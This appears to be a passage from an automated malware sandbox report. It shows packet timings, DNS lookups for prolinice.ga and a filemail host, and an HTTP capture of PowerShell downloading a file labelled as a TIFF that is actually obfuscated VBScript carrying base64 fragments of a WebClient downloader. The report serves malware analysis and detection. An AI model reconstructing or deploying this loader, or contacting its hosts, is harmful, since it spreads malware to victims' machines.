Nov 18, 2024 18:38:09.701821089 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.701837063 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.701852083 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.701868057 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.701910019 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.701939106 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.854083061 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.854218960 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.854285002 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.344760895 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.344866991 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.344886065 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.344912052 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.345278978 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.345295906 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.345341921 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.345633030 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.345648050 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.345698118 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.345993996 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.346009970 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.346055984 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.346276999 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.346293926 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.346322060 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.346808910 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.346824884 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.346839905 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.346854925 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.346857071 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.346878052 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.347459078 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.347475052 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.347498894 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.347501040 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.347515106 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.347544909 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.348282099 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.348320007 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.348355055 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.348370075 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.348407030 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.348851919 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.348886967 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.348921061 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.348956108 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.348970890 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.349004030 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.349704027 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.349742889 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.349777937 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.349812984 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.349829912 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.349863052 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.350529909 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.350567102 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.350600958 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.350624084 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.350637913 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.350672007 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.350709915 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.351418018 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.351473093 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.351453066 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.351516008 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.351551056 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.351594925 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.352222919 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.352258921 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.352309942 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.352313995 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.352346897 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.352359056 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.352382898 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.352513075 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.353096962 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.353132010 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.353173018 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.353183985 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.353189945 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.353264093 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.356931925 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.356967926 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.357002020 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.357013941 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.357302904 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.357336998 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.357346058 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.357867002 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.359658957 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.465935946 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.465974092 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.466010094 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.466056108 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.466857910 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.466892958 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.466928959 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.467166901 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.467195988 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.467237949 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.467641115 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.467675924 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.467710018 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.467849970 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.467849970 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.468348026 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.468415022 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.468450069 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.468496084 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.469191074 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.469225883 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.469244003 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.469259024 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.469293118 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.469337940 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.470446110 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.470479965 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.470513105 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.470514059 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.470550060 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.470593929 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.470849991 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.470884085 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.470905066 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.470917940 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.470961094 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.471673012 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.471708059 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.471743107 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.471807003 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.472547054 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.472582102 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.472615957 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.472634077 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.472651005 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.472713947 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.473371983 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.473407984 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.473455906 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.474375010 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.474423885 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.475148916 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.475183964 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.475219011 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.475267887 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.475271940 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.475341082 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.475923061 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.475955963 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.476012945 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.476717949 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.476753950 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.476787090 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.476802111 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.477566004 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.477600098 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.477617979 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.477664948 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.477699041 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.477735996 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.478408098 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.478444099 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.478461027 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.478492022 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.478547096 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.479237080 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.479270935 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.479305983 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.479336977 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.480073929 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.480108976 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.480142117 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.480145931 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.480178118 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.480199099 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.482692957 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.482767105 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.482781887 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.482798100 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.482892036 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.483056068 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.483089924 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.483124018 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.483139992 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.483160019 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.483201981 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.483877897 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.483911991 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.484258890 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.484580994 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.484615088 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.484647989 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.484682083 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.484697104 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.484734058 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.485373974 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.485408068 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.485440969 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.485466003 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.486022949 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.486057043 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.486092091 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.486119986 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.486124992 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.486162901 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.486851931 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.486886978 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.486901045 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.487608910 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.487643003 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.487694979 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.488369942 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.488404036 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.488416910 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.488436937 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.489099026 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.489134073 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.489141941 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.489176035 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.489860058 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.491451979 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.491506100 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.492186069 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.492219925 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.492254972 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.492288113 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.492291927 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.492332935 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.496922016 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.508605003 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:10.509402037 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:10.511568069 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:15.774880886 CET	49817	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:15.780409098 CET	80	49817	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:15.780503035 CET	49817	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:15.780714035 CET	49817	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:15.780919075 CET	49817	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:15.788286924 CET	80	49817	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:15.788325071 CET	80	49817	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:15.788355112 CET	80	49817	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:15.788676023 CET	80	49817	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:15.788706064 CET	80	49817	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:17.020526886 CET	80	49817	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:17.024024010 CET	49817	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:17.031472921 CET	80	49817	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:17.031596899 CET	49817	80	192.168.2.4	46.173.214.24

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 18:37:24.870785952 CET	52670	53	192.168.2.4	1.1.1.1
Nov 18, 2024 18:37:24.908104897 CET	53	52670	1.1.1.1	192.168.2.4
Nov 18, 2024 18:38:07.662674904 CET	58961	53	192.168.2.4	1.1.1.1
Nov 18, 2024 18:38:07.958018064 CET	53	58961	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 18, 2024 18:37:24.870785952 CET	192.168.2.4	1.1.1.1	0x69e	Standard query (0)	1017.filemail.com	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:38:07.662674904 CET	192.168.2.4	1.1.1.1	0xdf35	Standard query (0)	prolinice.ga	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 18, 2024 18:37:24.908104897 CET	1.1.1.1	192.168.2.4	0x69e	No error (0)	1017.filemail.com	ip.1017.filemail.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 18:37:24.908104897 CET	1.1.1.1	192.168.2.4	0x69e	No error (0)	ip.1017.filemail.com		142.215.209.78	A (IP address)	IN (0x0001)	false
Nov 18, 2024 18:38:07.958018064 CET	1.1.1.1	192.168.2.4	0xdf35	No error (0)	prolinice.ga		46.173.214.24	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

1017.filemail.com

107.172.44.178

siwffuchsxpuu.net

prolinice.ga

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	107.172.44.178	80	5592	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:37:18.081362963 CET	332	OUT	GET /53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 107.172.44.178 Connection: Keep-Alive
Nov 18, 2024 18:37:18.758707047 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:37:18 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 18 Nov 2024 01:46:22 GMT ETag: "227fc-62726156f5f6d" Accept-Ranges: bytes Content-Length: 141308 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 65 00 6e 00 67 00 6f 00 6d 00 61 00 64 00 65 00 6c 00 61 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 63 00 6f 00 72 00 6e 00 6f 00 66 00 6f 00 6e 00 65 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 6d 00 6f 00 71 00 75 00 65 00 6e 00 63 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 61 00 70 00 72 00 65 00 73 00 61 00 72 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 61 00 73 00 73 00 65 00 6e 00 74 00 69 00 6d 00 65 00 6e 00 74 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 61 00 73 00 73 00 65 00 6e 00 74 00 69 00 6d 00 65 00 6e 00 74 00 6f 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 63 00 6f 00 72 00 6e 00 6f 00 66 00 6f 00 6e 00 65 00 2c 00 20 00 6d 00 6f 00 71 00 75 00 65 00 6e 00 63 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 61 00 73 00 73 00 65 00 6e 00 74 00 69 00 [TRUNCATED] Data Ascii: Function engomadela(ByVal cornofone, ByVal moquenco, ByVal apresar) Dim assentimento assentimento = InStr(cornofone, moquenco) Do While assentimento > 0 cornofone = Left(cornofone, assentimento - 1) & apresar & Mid(cornofone, assentimento + Len(moquenco)) assentimento = InStr(assentimento + Len(apresar), cornofone, moquenco) Loop engomadela = cornofoneEnd Functionprivate function ReadStdIn(
Nov 18, 2024 18:37:18.758750916 CET	1236	IN	Data Raw: 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 77 00 68 00 69 00 6c 00 65 00 20 00 4e 00 6f 00 74 00 20 00 73 00 74 00 64 00 49 00 6e 00 2e 00 41 00 74 00 45 00 6e 00 64 00 4f 00 66 00 53 00 74 00 72 00 65 00 61 00 6d 00 0d 00 0a 00 20 00 20 00 20 Data Ascii: ) while Not stdIn.AtEndOfStream ReadStdIn = ReadStdIn & stdIn.ReadAll wendend functionIf Not f
Nov 18, 2024 18:37:18.758764029 CET	424	IN	Data Raw: 00 6d 00 70 00 6c 00 59 00 33 00 4b 00 58 00 4e 00 56 00 46 00 43 00 52 00 50 00 4a 00 53 00 4c 00 55 00 51 00 4d 00 44 00 51 00 67 00 55 00 33 00 6c 00 7a 00 64 00 47 00 56 00 74 00 4c 00 6b 00 35 00 6c 00 64 00 43 00 4b 00 58 00 4e 00 56 00 46 Data Ascii: mplY3KXNVFCRPJSLUQMDQgU3lzdGVtLk5ldCKXNVFCRPJSLUQMD5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9h
Nov 18, 2024 18:37:18.758919954 CET	1236	IN	Data Raw: 00 47 00 56 00 34 00 64 00 43 00 35 00 46 00 62 00 6d 00 4e 00 76 00 5a 00 47 00 6c 00 75 00 5a 00 31 00 30 00 36 00 4f 00 6c 00 56 00 55 00 52 00 6a 00 67 00 75 00 52 00 32 00 56 00 30 00 55 00 33 00 52 00 79 00 61 00 57 00 35 00 6e 00 4b 00 48 Data Ascii: GV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1" engordamento = engordam
Nov 18, 2024 18:37:18.758932114 CET	1236	IN	Data Raw: 00 67 00 63 00 32 00 56 00 5a 00 63 00 33 00 52 00 68 00 63 00 6e 00 52 00 47 00 62 00 47 00 46 00 6e 00 4c 00 6b 00 78 00 6c 00 62 00 6d 00 64 00 30 00 61 00 44 00 74 00 7a 00 5a 00 56 00 6c 00 69 00 59 00 58 00 4e 00 6c 00 4e 00 6a 00 52 00 4d Data Ascii: gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllKXNVFCRPJSLUQMDbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2KXNVFCRPJSLUQMD
Nov 18, 2024 18:37:18.758944035 CET	424	IN	Data Raw: 00 6e 00 67 00 6f 00 72 00 64 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 20 00 3d 00 20 00 65 00 6e 00 67 00 6f 00 72 00 64 00 61 00 6d 00 65 00 6e 00 74 00 6f 00 20 00 26 00 20 00 22 00 73 00 6e 00 63 00 32 00 56 00 5a 00 59 00 6d 00 46 00 7a 00 5a Data Ascii: ngordamento = engordamento & "snc2VZYmFzZTY0UmV2ZXJzZKXNVFCRPJSLUQMDWQpO3KXNVFCRPJSLUQMDNlWScrJ2xvYWRlZEKXNVFCRPJSLUQMDFz
